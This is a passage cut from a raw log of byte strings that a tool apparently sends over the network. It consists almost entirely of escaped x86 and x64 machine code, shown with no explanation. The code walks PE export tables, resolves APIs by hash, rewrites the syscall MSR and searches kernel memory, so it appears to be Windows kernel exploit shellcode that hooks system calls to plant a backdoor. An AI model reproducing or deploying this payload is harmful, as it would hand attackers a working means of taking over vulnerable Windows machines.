\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 10, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\